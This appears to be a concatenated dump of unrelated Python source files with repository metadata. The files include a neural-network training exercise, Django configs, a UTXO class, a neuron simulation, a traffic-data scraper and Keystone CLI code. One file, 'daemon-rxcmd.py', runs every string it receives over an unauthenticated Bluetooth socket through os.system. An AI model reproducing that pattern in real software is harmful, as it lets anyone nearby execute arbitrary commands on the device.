delta1 = np.dot(delta2, W2.T) * functions.d_relu(z1)
## 試してみよう
# delta1 = np.dot(delta2, W2.T) * functions.d_sigmoid(z1)
delta1 = delta1[np.newaxis, :]
# b1の勾配
grad['b1'] = np.sum(delta1, axis=0)
x = x[np.newaxis, :]
# W1の勾配
grad['W1'] = np.dot(x.T, delta1)
# print_vec("偏微分_重み1", grad["W1"])
# print_vec("偏微分_重み2", grad["W2"])
# print_vec("偏微分_バイアス1", grad["b1"])
# print_vec("偏微分_バイアス2", grad["b2"])
return grad
# サンプルデータを作成
data_sets_size = 100000
data_sets = [0 for i in range(data_sets_size)]
for i in range(data_sets_size):
data_sets[i] = {}
# ランダムな値を設定
data_sets[i]['x'] = np.random.rand(2)
## 試してみよう_入力値の設定
# data_sets[i]['x'] = np.random.rand(2) * 10 -5 # -5〜5のランダム数値
# 目標出力を設定
data_sets[i]['d'] = f(data_sets[i]['x'])
losses = []
# 学習率
learning_rate = 0.07
# 抽出数
epoch = 1000
# パラメータの初期化
network = init_network()
# データのランダム抽出
random_datasets = np.random.choice(data_sets, epoch)
# 勾配降下の繰り返し
for dataset in random_datasets:
x, d = dataset['x'], dataset['d']
z1, y = forward(network, x)
grad = backward(x, d, z1, y)
# パラメータに勾配適用
for key in ('W1', 'W2', 'b1', 'b2'):
network[key] -= learning_rate * grad[key]
# 誤差
loss = functions.mean_squared_error(d, y)
losses.append(loss)
print("##### 結果表示 #####")
lists = range(epoch)
plt.plot(lists, losses, '.')
plt.title('loss')
# グラフの表示
plt.show()
|
[
"[email protected]"
] | |
5b2cb107207f28aa4fb223e5d981c7c6eb002b41
|
8d6dc6024e8aca3ab1e11514f9c36911e5225df2
|
/004_Homework/viking_loto.py
|
7d5f868e4d9876867d9e0be4d12a83812dad7f71
|
[] |
no_license
|
JanaSed/Homeworks
|
16bfeecd35eeb853c9e72108c3fb5e5419bb8f8f
|
efe0de7174385563358c48f5d67da5e05d686e66
|
refs/heads/master
| 2023-07-04T21:54:21.279882 | 2021-08-16T17:52:28 | 2021-08-16T17:52:28 | 379,962,510 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 113 |
py
|
import random
from random import randint
print(random.sample(range(48), 6))
print(random.sample(range(1, 5), 1))
|
[
"[email protected]"
] | |
1ac88f58fc4e55c54fef3bbf16f971a05570079f
|
90af0a07a800fe88902e5c8c160e39456ecf9f5b
|
/pydir/daemon-rxcmd.py
|
00f98fcc7ad708cdb8461545e3e983acadcf9667
|
[
"Apache-2.0"
] |
permissive
|
jmdahling/RxCmd
|
8fb1cdc32764947b35416a46e2a0764634784cea
|
000375e30f1cee622c188967b8de7874e982fd0d
|
refs/heads/master
| 2021-01-19T19:45:46.878305 | 2017-04-16T19:43:28 | 2017-04-16T19:43:28 | 88,442,730 | 0 | 0 | null | 2017-04-16T21:10:04 | 2017-04-16T21:10:04 | null |
UTF-8
|
Python
| false | false | 1,253 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 F Dou<[email protected]>
# See LICENSE for details.
import bluetooth
import os
import logging
import time
from daemon import runner
class RxCmdDaemon():
def __init__(self):
self.stdin_path = '/dev/null'
# self.stdout_path = '/dev/tty'
self.stdout_path = '/home/robot/pydir/daemon.log'
self.stderr_path = '/home/robot/pydir/daemon.log'
# self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/RxCmdDaemon.pid'
self.pidfile_timeout = 5
def run(self):
while True:
server_sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )
port = 1
server_sock.bind(("",port))
server_sock.listen(1)
client_sock,address = server_sock.accept()
print "Accepted connection from ",address
try:
while True:
data = client_sock.recv(1024)
print "received [%s]" % data
os.system(data)
except Exception as e:
logging.exception(e)
rxCmdDaemon = RxCmdDaemon()
daemon_runner = runner.DaemonRunner(rxCmdDaemon)
daemon_runner.do_action()
|
[
"[email protected]"
] | |
419b271226298b03583d193a10914df6729aeb1c
|
137e4fc41341350550106ce897eba9617e34a4d5
|
/example_feedback/urls.py
|
4a76a819aa393aba1b5d28aa927a76b6b5be0963
|
[] |
no_license
|
javierLiarte/django-simple-feedback-1
|
888425d288965ad8ee581d91be12af28ee87d14e
|
1aca0df0b9a1773624bfb3d3ba6aa8696d8d239b
|
refs/heads/master
| 2021-01-17T06:56:47.592413 | 2014-10-10T15:42:58 | 2014-10-10T15:42:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 825 |
py
|
from django.conf.urls.defaults import patterns, include, url
from django.views.generic.simple import direct_to_template
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url('^$', direct_to_template, {'template': 'base.html'}),
url('^feedback/$', include('feedback.urls')),
(r'^accounts/login/$', 'django.contrib.auth.views.login'),
# Examples:
# url(r'^$', 'example_feedback.views.home', name='home'),
# url(r'^example_feedback/', include('example_feedback.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
)
|
[
"[email protected]"
] | |
fb9ba2d39a850faee8978b4ef1f593af35a95224
|
fd71857adc56fe72bbb3c302a1013e8de8511c50
|
/bitcoin/utxo.py
|
b95630c872cd8cc9007f834a233bda67c0d03e98
|
[] |
no_license
|
AbhishekAshokDubey/blockchain_python
|
a209b5f23e16c5e8b1739a57eecfd95952ed52ae
|
e64c72420bfe746a87f5255f94a8f4c1cf1a8789
|
refs/heads/master
| 2020-03-25T14:36:47.942295 | 2018-08-07T11:29:50 | 2018-08-07T11:29:50 | 143,863,591 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,156 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 27 15:44:15 2018
@author: ADubey4
"""
"""Done"""
# http://gerg.ca/blog/post/2012/python-comparison/
# https://docs.python.org/3.5/library/functools.html#functools.total_ordering
from functools import total_ordering
import copy
@total_ordering
class UTXO :
@staticmethod
def cmp(a, b):
return (a > b) - (a < b)
def __init__(self, tx_hash, index):
self.tx_hash = copy.copy(tx_hash)
self.index = index
def equals(self, other_utxo=None):
return ((self.tx_hash == other_utxo.tx_hash) and (self.index == other_utxo.index))
def get_hash_code(self):
hash_code = 1
hash_code = 17 + self.index
hash_code = hash_code * 31 + hash(self.tx_hash)
return hash_code
## everything below: the way to implemet a comparable in python
def __cmp__(self, other_utxo):
other_hashcode = other_utxo.tx_hash
other_index = other_utxo.index
if(other_index > self.index):
return -1
elif (other_index < self.index):
return 1
else:
if len(other_hashcode) > len(self.tx_hash):
return -1
elif len(other_hashcode) < len(self.tx_hash):
return 1
else:
return self.cmp(self.tx_hash, other_hashcode)
# __cmp__ is removed from python 3.X and hence we need to implemet something move
def __eq__(self, other):
return self.__cmp__(other) == 0
def __lt__(self, other):
return self.__cmp__(other) < 0
# required only when we use the object as dict key or in set
# as they Data structures uses hash internally
# def __hash__(self):
# return self.get_hash_code()
# below code is not required because of @total_ordering, else we would need everything below
# def __ne__(self, other):
# return self.__cmp__(other) != 0
# def __gt__(self, other):
# return self.__cmp__(other) > 0
# def __ge__(self, other):
# return self.__cmp__(other) >= 0
# def __le__(self, other):
# return self.__cmp__(other) <= 0
|
[
"[email protected]"
] | |
8a8680338eb791a54e04854473d5d7158ca44726
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/pytype/pytype/tools/merge_pyi/test_data/var_annot.comment.py
|
8d3907c0a79e522e7a66e1587e8a8ca132b76a38
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null |
UTF-8
|
Python
| false | false | 128 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:fbf532cb3bc3376967d6a665559e5b50273ee6371ee9080fcc2f2d7e3592c2eb
size 156
|
[
"[email protected]"
] | |
83cef915c5831fa22780de720175e98cce80ccc3
|
3a4f14d6638bc0c12c129ed73c6c3543437203df
|
/src/morphforgeexamples/multicell_simulation/multicell_simulation010.py
|
4e246688646bd3831457507719b3611426692cef
|
[
"BSD-2-Clause"
] |
permissive
|
unidesigner/morphforge
|
ef04ccb3877f069a0feea72eb1b44c97930dac44
|
510cd86549b2c2fb19296da2d4408ed8091fb962
|
refs/heads/master
| 2021-01-15T22:34:28.795355 | 2012-04-05T08:55:12 | 2012-04-05T08:55:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 51 |
py
|
"""[*] Two cells connected with an AMPA synapse"""
|
[
"[email protected]"
] | |
2c6659fa00d6ac07197690b564d7aac721369d86
|
a2fb6bda878d79e4b31d8b3d76d9a2a40dc604ef
|
/backend/notes/serializers.py
|
6388c086796a97dc998df942375fbc474461a86c
|
[] |
no_license
|
Aruta1ru/budgeter
|
b3224b68601df29e952d34630d2c5891b3883291
|
672232d1be853a948171825d7b380d8d2e131f94
|
refs/heads/master
| 2023-03-27T04:01:09.424337 | 2021-03-12T12:27:54 | 2021-03-12T12:27:54 | 346,987,850 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 319 |
py
|
from rest_framework import serializers
from .models import Category, Note
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = '__all__'
class NoteSerializer(serializers.ModelSerializer):
class Meta:
model = Note
fields = '__all__'
|
[
"[email protected]"
] | |
5120c0f875dbadae51d4066d3e76b655e03280e0
|
7c222e4dd6e434ee6a489c0e518744245735cce8
|
/hackerspace_site/apps/blog/forms.py
|
2858af5dd2f46bae7db8f12edf12ec88d952961e
|
[] |
no_license
|
HackerSpace-PESU/hackerspace.pes.edu
|
ad9183eb4421d9c8534d98dbfdcf80069f0b58b3
|
0a45bc9c1ed58eba83d3c5b04f054cd36c7e9fc7
|
refs/heads/master
| 2023-05-14T00:34:49.590888 | 2021-05-27T09:51:56 | 2021-05-27T09:51:56 | 322,908,540 | 9 | 4 | null | 2021-05-27T09:51:57 | 2020-12-19T18:07:54 |
HTML
|
UTF-8
|
Python
| false | false | 373 |
py
|
from django.forms import ModelChoiceField, ModelForm
from martor.fields import MartorFormField
from .models import Author, Blog
class NewBlogForm(ModelForm):
author = ModelChoiceField(
queryset=Author.objects.all(),
)
blog_in_markdown = MartorFormField()
class Meta:
model = Blog
fields = ["author", "title", "blog_in_markdown"]
|
[
"[email protected]"
] | |
407de71cbc79d7d56529dc074e6ec44af29d49ae
|
d5a7202c1cd60ab487c4f5367bc9a4bfa3de3440
|
/TestBed/src/brain/examples/misc/ring.py
|
1aa39dac35d163116bde320f633d1b2500d7e86b
|
[] |
no_license
|
thanhmaikmt/pjl
|
40b202fa8bd513f2103bc82f3b770a1fcdcb4141
|
f2fb00f297c63a5211198cd47edce0aacfba6c11
|
refs/heads/master
| 2021-01-19T09:48:51.301034 | 2014-04-04T18:28:59 | 2014-04-04T18:28:59 | 40,103,495 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 393 |
py
|
"""
A ring of integrate-and-fire neurons.
"""
from brian import *
tau = 10 * ms
v0 = 11 * mV
N = 20
w = 1 * mV
ring = NeuronGroup(N, model='dv/dt=(v0-v)/tau : volt', threshold=10 * mV, reset=0 * mV)
W = Connection(ring, ring, 'v')
for i in range(N):
W[i, (i + 1) % N] = w
ring.v = rand(N) * 10 * mV
S = SpikeMonitor(ring)
run(300 * ms)
raster_plot(S)
show()
|
[
"pauljohnleonard@fadc175c-ebca-11de-a75d-bbceaaa5444e"
] |
pauljohnleonard@fadc175c-ebca-11de-a75d-bbceaaa5444e
|
4e6c7d73d626383ba1cf1342cec8ceeefd7552ac
|
e6cc19f280d737e4c37ad499c9c5370ec9079a1f
|
/project_euler_solutions/problem_9.py
|
e18867f8541e3b78ce778214acc2cc1a408672a8
|
[] |
no_license
|
jdgsmallwood/ProjectEuler
|
f705611b903d6615894b60c087ee2e74088715c2
|
f310421ca82046fdf18f606e8752ed9ce6c8be36
|
refs/heads/master
| 2023-01-07T16:08:46.165465 | 2020-11-14T00:57:01 | 2020-11-14T00:57:01 | 111,932,708 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 417 |
py
|
target = 1000
#We're making an assumption without loss of generality that a < b < c
for a in range(1,1000):
for b in range(a,1000):
c = 1000 - a - b
if a**2 + b**2 == c**2:
if a + b+ c == target:
print('A: %f' % a)
print('B: %f'% b)
print("C: %f" % c)
print(a*b*c)
break
# I think the answer is 31875000
|
[
"[email protected]"
] | |
125fd5dd7734d83661f29aaad97899bcd613ff7e
|
8b5225609f76dab9afb261654d27074c1ce24d03
|
/md_320_2.py
|
5effc01ceb3db4260a53eb402c8f3507ef17d65f
|
[] |
no_license
|
wlstjd2378/python4095
|
27a55db195380b82641cab7cba5fee3ed8aaff83
|
78f45ea30aa3dabd14d5422813092ba8c031c8e3
|
refs/heads/master
| 2020-05-30T17:49:50.405382 | 2019-06-03T03:18:58 | 2019-06-03T03:18:58 | 189,883,998 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,973 |
py
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
url = 'http://apis.data.go.kr/B552061/jaywalking/getRestJaywalking'
queryParams = '?' + 'serviceKey=' + 'nBR6ds%2BFTLtKBfkc9qEKhBBGdZF09DnpkSRWSKTyxiHp%2BRVBtJbWjTQMqvvMb%2FVf0TGceYhCeGyvpHtJAhIlJA%3D%3D' \
+ '&searchYearCd=' + '2017' \
+ '&siDo=' + '26' \
+ '&guGun=' + '320' \
+ '&type=' + 'xml' \
+ '&numOfRows=' + '25' \
+ '&pageNo=' + '1'
url = url + queryParams
result = requests.get(url)
bs_obj = BeautifulSoup(result.content, "html.parser")
data1 = bs_obj.findAll('spot_nm') #다발지역명
data2 = bs_obj.findAll('occrrnc_cnt') #발생건수
data3 = bs_obj.findAll('dth_dnv_cnt') #사망자
data4 = bs_obj.findAll('caslt_cnt') #부상자
data5 = bs_obj.findAll('se_dnv_cnt') #중상자
data6 = bs_obj.findAll('sl_dnv_cnt') #경상자
# list_data = {'다발지역명':[],'발생건수':[],'사망자수':[],\
# '부상자수':[],'중상':[],'경상':[],\
# '시군구':['중구','서구','동구','영도구','부산진구','동래구','남구','북구','해운대구','사하구','금정구','강서구','연제구','수영구','사상구','기장군']}
data = {'시군구': [],'다발지역명':[],'발생건수':[],'사망자수':[],'부상자수':[],'중상':[],'경상':[]}
d1,d2,d3,d4,d5,d6,d7 = [],[],[],[],[],[],[]
for i in range(0,len(data1)):
d1.append(data1[i].get_text())
d2.append(data2[i].get_text())
d3.append(data3[i].get_text())
d4.append(data4[i].get_text())
d5.append(data5[i].get_text())
d6.append(data6[i].get_text())
d7.append('북구')
data['다발지역명'] = d1
data['발생건수'] = d2
data['사망자수'] = d3
data['부상자수'] = d4
data['중상'] = d5
data['경상'] = d6
data['시군구'] = d7
df_320_2 = pd.DataFrame(data, columns = ['시군구','다발지역명','발생건수','사망자수','부상자수','중상','경상'])
#print(df_320_2)
|
[
"[email protected]"
] | |
85a9386cf8f783bd013959909bab9d7614a1d07a
|
78aa3c2e1bf95fa1e440f40c0a27273d5f1f6284
|
/com.kuta.python.basedata/Tuple.py
|
8bc3b8d619a73ec7ac5df3d0d6ecdd51184875d3
|
[] |
no_license
|
kutala/HelloPython
|
c98b2fe1be67b5bbd08a0ada08b875f7ce2075dd
|
d685a27956aecd01839b05523fe1f2b8b6891296
|
refs/heads/master
| 2021-01-01T15:30:14.962842 | 2016-11-29T09:38:39 | 2016-11-29T09:38:39 | 40,281,912 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 395 |
py
|
# -*- coding: UTF-8 -*-
tuple = ( 'abcd', 786 , 2.23, 'john', 70.2 )
tinytuple = (123, 'john')
print tuple # 输出完整元组
print tuple[0] # 输出元组的第一个元素
print tuple[1:3] # 输出第二个至第三个的元素
print tuple[2:] # 输出从第三个开始至列表末尾的所有元素
print tinytuple * 2 # 输出元组两次
print tuple + tinytuple # 打印组合的元组
|
[
"[email protected]"
] | |
69b82c6e7c1b89da41ffdaf1099f828d16af52f8
|
3f3091436da6e2032949b3c474a663fee188f5d5
|
/webempresa/services/migrations/0004_project.py
|
ce1253050d026a35927123cc36077ac8f0560332
|
[] |
no_license
|
juanantoniotora/Curso_DJango2_WebCorporativa_Ejemplo
|
b9993bc740ee2b47c034938870841d5ee35152e7
|
975acbc0a601206edeb6235588e710c3698a192d
|
refs/heads/master
| 2022-12-07T07:01:50.230314 | 2019-10-10T19:26:00 | 2019-10-10T19:26:00 | 214,251,337 | 0 | 0 | null | 2022-11-22T02:24:23 | 2019-10-10T18:02:07 |
Python
|
UTF-8
|
Python
| false | false | 1,192 |
py
|
# Generated by Django 2.2.4 on 2019-10-05 18:44
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('services', '0003_delete_project'),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Título')),
('subtitle', models.CharField(max_length=200, verbose_name='Sub-título')),
('content', models.TextField(default='', verbose_name='Contenido')),
('image', models.ImageField(upload_to='', verbose_name='Imagen')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Creado')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Actualizado')),
],
options={
'verbose_name': 'modelo_Servicio',
'verbose_name_plural': 'tabla_Servicios',
'ordering': ['-created'],
},
),
]
|
[
"[email protected]"
] | |
ed56edac7dcdd5606246aad436c9d852a3f3f40f
|
786f34fc2fea4f764d083b2bb3fd75222dfbbac1
|
/jobsPortal/jobsPortal/urls.py
|
df7cc52aa22d588c3e134c6f19a0b5e4a7a1e052
|
[] |
no_license
|
shivendra04/DjangoProjects
|
6c4ddc58588c7033afa7a1f5a299e33b1afb3897
|
d3a190fd47582190f2ad41d8dc4b30b7841cf679
|
refs/heads/master
| 2022-12-20T00:01:22.524044 | 2020-09-22T08:05:43 | 2020-09-22T08:05:43 | 297,578,265 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 994 |
py
|
"""jobsPortal URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from jobsApp import views
urlpatterns = [
path('admin/', admin.site.urls),
path('home/', views.home),
path('home/hydjobs/', views.hydjob),
path('home/punejobs/', views.punejob),
path('home/banglorejobs/', views.banglorejob),
path('home/chennaijobs/', views.chennaijob),
]
|
[
"[email protected]"
] | |
b1a8761bb8817603f8a347b24bff02b3180b2855
|
2fc0ae670f7200a7ad936eb1e3c9d56b5ef879df
|
/create.py
|
8931526e88b73d1ab967c5b07648b2e2abae3857
|
[] |
no_license
|
alexlesan/python_automatization
|
0013c7051c94175bf17dc4ac6203db7e89f1db94
|
b6a3a4f9bd1b282dee54f5f6c783f5aa0d23dfa0
|
refs/heads/master
| 2020-09-11T06:53:54.108793 | 2019-11-15T18:24:03 | 2019-11-15T18:24:03 | 221,979,550 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,141 |
py
|
import os, errno, sys, config
import argparse
import subprocess
import time
#parser arguments
parser = argparse.ArgumentParser(description='Create new local project')
parser.add_argument('--name', type=str, help='Name of the project')
parser.add_argument('--open', type=int, nargs='?', const=1, help='Open the editor with the project')
# make the directory of the project
def make_dir(domain):
try:
path_dir = config.PATH+domain
os.mkdir(path_dir, config.ACCESS_RIGHTS)
os.chmod(path_dir, config.ACCESS_RIGHTS)
print ("Successfully created the directory: "+path_dir)
make_nginx_file(domain)
except OSError as e:
str_error = e.strerror
if e.errno == errno.EEXIST:
str_error = "\tThe directory already exists."
str = "\tCoudn't create the directory: "+path_dir+"."
print(str)
print(str_error)
# make the nginx site-availables file and link to enabled-sites
def make_nginx_file(domain):
try:
filename_loc = domain+".loc"
full_path = config.NGINX_SITE_AVAILABLES_PATH+filename_loc
site_enabled_path = config.NGINX_SITE_ENABLED_PATH+filename_loc
#replace in file template and copy to nginx
temp_file = open(config.TEMPLATE_VH, 'r')
dest_file = open(full_path, 'w')
file_lines = temp_file.readlines()
for line in file_lines:
res = line.replace("{PROJECT_NAME}", domain)
dest_file.write(res.replace("{SERVER_NAME}", filename_loc))
temp_file.close()
dest_file.close()
#create the symlink to site-enabled
os.symlink(full_path, site_enabled_path)
print("Symlink was created.")
#update the hosts file
update_hosts_file(domain)
#restart the nginx server
restart_nginx()
except OSError as e:
print (e.strerror)
# update the hosts file with new virutal host url
def update_hosts_file(domain):
try:
str_line = "\n127.0.0.1\t"+domain.lower()+".loc"
with open(config.HOSTS_FILE_PATH, 'a') as f:
f.write(str_line)
print("Hosts file was updated.")
except OSError as e:
print(e.strerror)
# restart the engin server after modifications
def restart_nginx():
try:
#restart the nginx
command_str = "sudo systemctl restart nginx"
os.system(command_str)
print("The nginx server was restarted successfully")
except:
print("Coudn't restart the nginx server")
# check and run the command
if __name__ == '__main__':
param = vars(parser.parse_args())
domain = param['name'].lower()
open_editor = param['open']
if domain != '':
make_dir(domain)
if open_editor == 1:
# open the project in atom editor
print("\t Opening the Atom editor...")
# atom_cmd = ["atom", config.PATH+domain]
# subprocess.Popen(atom_cmd).wait()
os.system('atom '+config.PATH+domain)
time.sleep(1)
print("\t The process was finished.")
else:
print("No domain name was provided.")
|
[
"[email protected]"
] | |
88f37dcfa3636c5a91c3546ae84c383167f931e2
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python-flask/generated/openapi_server/models/com_adobe_cq_social_commons_emailreply_impl_custom_email_client_provider_properties.py
|
4d9bc47c42da303a7c969c543512bee62080c310
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 |
Apache-2.0
| 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null |
UTF-8
|
Python
| false | false | 4,134 |
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.config_node_property_array import ConfigNodePropertyArray # noqa: F401,E501
from openapi_server.models.config_node_property_integer import ConfigNodePropertyInteger # noqa: F401,E501
from openapi_server import util
class ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, priority_order: ConfigNodePropertyInteger=None, reply_email_patterns: ConfigNodePropertyArray=None): # noqa: E501
"""ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties - a model defined in OpenAPI
:param priority_order: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:type priority_order: ConfigNodePropertyInteger
:param reply_email_patterns: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:type reply_email_patterns: ConfigNodePropertyArray
"""
self.openapi_types = {
'priority_order': ConfigNodePropertyInteger,
'reply_email_patterns': ConfigNodePropertyArray
}
self.attribute_map = {
'priority_order': 'priorityOrder',
'reply_email_patterns': 'replyEmailPatterns'
}
self._priority_order = priority_order
self._reply_email_patterns = reply_email_patterns
@classmethod
def from_dict(cls, dikt) -> 'ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The comAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:rtype: ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties
"""
return util.deserialize_model(dikt, cls)
@property
def priority_order(self) -> ConfigNodePropertyInteger:
"""Gets the priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:return: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:rtype: ConfigNodePropertyInteger
"""
return self._priority_order
@priority_order.setter
def priority_order(self, priority_order: ConfigNodePropertyInteger):
"""Sets the priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:param priority_order: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:type priority_order: ConfigNodePropertyInteger
"""
self._priority_order = priority_order
@property
def reply_email_patterns(self) -> ConfigNodePropertyArray:
"""Gets the reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:return: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:rtype: ConfigNodePropertyArray
"""
return self._reply_email_patterns
@reply_email_patterns.setter
def reply_email_patterns(self, reply_email_patterns: ConfigNodePropertyArray):
"""Sets the reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:param reply_email_patterns: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:type reply_email_patterns: ConfigNodePropertyArray
"""
self._reply_email_patterns = reply_email_patterns
|
[
"[email protected]"
] | |
b24e6f5f4ec62487169653f0ea11233511822384
|
84baad5eae2bd1adb53e71429b17dcb7198e27ab
|
/keystone/keystone/cli.py
|
81fb2af4b2312a5fe763f8a695af31348765835c
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/x7_dep
|
396812eb50f431ab776bc63b8fce5f10f091d221
|
9a216e6fa3abdba1f63f9d36a4947c2a27de2bb7
|
refs/heads/master
| 2022-11-21T20:06:02.235330 | 2012-11-14T15:25:39 | 2012-11-14T15:25:39 | 282,193,462 | 0 | 0 | null | 2020-07-24T10:42:38 | 2020-07-24T10:42:38 | null |
UTF-8
|
Python
| false | false | 4,124 |
py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import json
import sys
import textwrap
from keystone import config
from keystone.common import utils
CONF = config.CONF
CONF.set_usage('%prog COMMAND')
class BaseApp(object):
def __init__(self, argv=None):
self.argv = argv
def run(self):
return self.main()
def missing_param(self, param):
print 'Missing parameter: %s' % param
CONF.print_help()
print_commands(CMDS)
sys.exit(1)
class DbSync(BaseApp):
"""Sync the database."""
name = 'db_sync'
def __init__(self, *args, **kw):
super(DbSync, self).__init__(*args, **kw)
def main(self):
for k in ['identity', 'catalog', 'policy', 'token']:
driver = utils.import_object(getattr(CONF, k).driver)
if hasattr(driver, 'db_sync'):
driver.db_sync()
class ImportLegacy(BaseApp):
"""Import a legacy database."""
name = 'import_legacy'
def __init__(self, *args, **kw):
super(ImportLegacy, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import legacy
if len(self.argv) < 2:
return self.missing_param('old_db')
old_db = self.argv[1]
migration = legacy.LegacyMigration(old_db)
migration.migrate_all()
class ExportLegacyCatalog(BaseApp):
"""Export the service catalog from a legacy database."""
name = 'export_legacy_catalog'
def __init__(self, *args, **kw):
super(ExportLegacyCatalog, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import legacy
if len(self.argv) < 2:
return self.missing_param('old_db')
old_db = self.argv[1]
migration = legacy.LegacyMigration(old_db)
print '\n'.join(migration.dump_catalog())
class ImportNovaAuth(BaseApp):
"""Import a dump of nova auth data into keystone."""
name = 'import_nova_auth'
def __init__(self, *args, **kw):
super(ImportNovaAuth, self).__init__(*args, **kw)
def main(self):
from keystone.common.sql import nova
if len(self.argv) < 2:
return self.missing_param('dump_file')
dump_file = self.argv[1]
dump_data = json.loads(open(dump_file).read())
nova.import_auth(dump_data)
CMDS = {'db_sync': DbSync,
'import_legacy': ImportLegacy,
'export_legacy_catalog': ExportLegacyCatalog,
'import_nova_auth': ImportNovaAuth,
}
def print_commands(cmds):
print
print 'Available commands:'
o = []
max_length = max([len(k) for k in cmds]) + 2
for k, cmd in sorted(cmds.iteritems()):
initial_indent = '%s%s: ' % (' ' * (max_length - len(k)), k)
tw = textwrap.TextWrapper(initial_indent=initial_indent,
subsequent_indent=' ' * (max_length + 2),
width=80)
o.extend(tw.wrap(
(cmd.__doc__ and cmd.__doc__ or 'no docs').strip().split('\n')[0]))
print '\n'.join(o)
def run(cmd, args):
return CMDS[cmd](argv=args).run()
def main(argv=None, config_files=None):
CONF.reset()
args = CONF(config_files=config_files, args=argv)
if len(args) < 2:
CONF.print_help()
print_commands(CMDS)
sys.exit(1)
cmd = args[1]
